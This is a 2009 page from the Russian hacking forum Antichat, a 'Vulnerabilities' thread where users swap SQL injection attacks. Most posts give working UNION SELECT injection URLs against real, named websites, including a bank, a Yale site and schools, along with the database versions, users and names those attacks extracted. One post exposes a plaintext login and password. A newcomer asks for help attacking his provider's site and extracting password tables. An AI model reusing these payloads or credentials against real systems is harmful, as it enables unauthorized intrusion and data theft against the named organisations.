ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7321  
Старый 03.01.2009, 17:56
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Питерское интернет кафе!

http://www.shangrila-spb.ru/index.php?action=view&id=-73+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT (0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64 ),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- &module=newsmodule&src=%40random41940a897e943

Database Version: 4.1.11-Debian_4sarge7-log
Database name: shangrila
User name: adminn@localhost

Детишкам поиграться -)

http://www.play-publishing.com/?id=72+union+select+1,2,3,concat_ws(0x3a3a,version (),user(),database()),5,6,7,8,9,10,11--

4.0.22
majkel@play.play.com.pl
musiccd

тИЦ = 40
PageRank = 5


http://www.dorian.ru/catalog/dog.php?screen=1&id=-72+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12--

5.0.67-log
u26951@10.10.10.216
u26951_catalog

тИЦ = 275
 
Ответить с цитированием

  #7322  
Старый 03.01.2009, 18:14
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Код:
http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/*
version: 4.1.20
user: ssac@mrcrabs.toolbox.net
database: ssac

Код:
http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14/*
version: 4.0.21-standard-log
user: webuser@web1
database: studcent

Код:
http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
version: 4.1.22-standard-log
user: opednews_vidya@localhost
database: opednews_pearl

Код:
http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
version: 5.0.45-log
user: etouser@205.178.145.65
database: eto

Код:
http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
version: 4.1.22-standard-log
user: 334937_alfred@172.16.11.218
database: 334937_calcms

Код:
http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
version: 4.0.24-log
user: rwjEditor@web.med.yale.edu
database: rwj

Код:
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
version: 4.0.27-standard-log
user: dbo120565932@212.227.119.149
database: db120565932

Код:
http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/*
version: 5.0.45-Max-log
user: srv11037_forum21@c29-w.ht-systems.ru
database: srv11037_forum

user: lenar
pass: vcxzasdf123

Код:
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
version: 5.0.45-log
user: oxid@localhost
database: synaptic

http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/*

version: 4.1.22-log
user: conex@alpha
database: conex
 
Ответить с цитированием

  #7323  
Старый 03.01.2009, 19:59
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Народ, помогите ламеру!!!
Нашол уязвимость, полей 15, а что дальше делать,понять не могу. Вставлял любые коды, везде ошибка. попробуйте вы...скажите где ошибка
 
Ответить с цитированием

  #7324  
Старый 03.01.2009, 20:01
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
 
Ответить с цитированием

  #7325  
Старый 03.01.2009, 20:05
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Цитата:
Сообщение от vakula  
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
PHP код:
Forbidden    You don't have permission to access / on this server. 
гм...
 
Ответить с цитированием

  #7326  
Старый 03.01.2009, 20:11
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Цитата:
Сообщение от ..::TROYAN::..  
PHP код:
Forbidden    You don't have permission to access / on this server. 
гм...
это сайт провайдера нашего....возможно вас просто не пускают
 
Ответить с цитированием

  #7327  
Старый 03.01.2009, 20:14
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,version(),16,17/*

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
 
Ответить с цитированием

  #7328  
Старый 03.01.2009, 23:37
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Всё...всем спасибо...тупо провтыкал куда ставить запрос
 
Ответить с цитированием

  #7329  
Старый 04.01.2009, 00:26
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

народ. подскажите как можна вытянуть имя таблицы для получения pass?

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
 
Ответить с цитированием

  #7330  
Старый 04.01.2009, 01:17
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986

Репутация: 21
По умолчанию

Цитата:
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
Forbidden типа запрещенный дотсуп
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ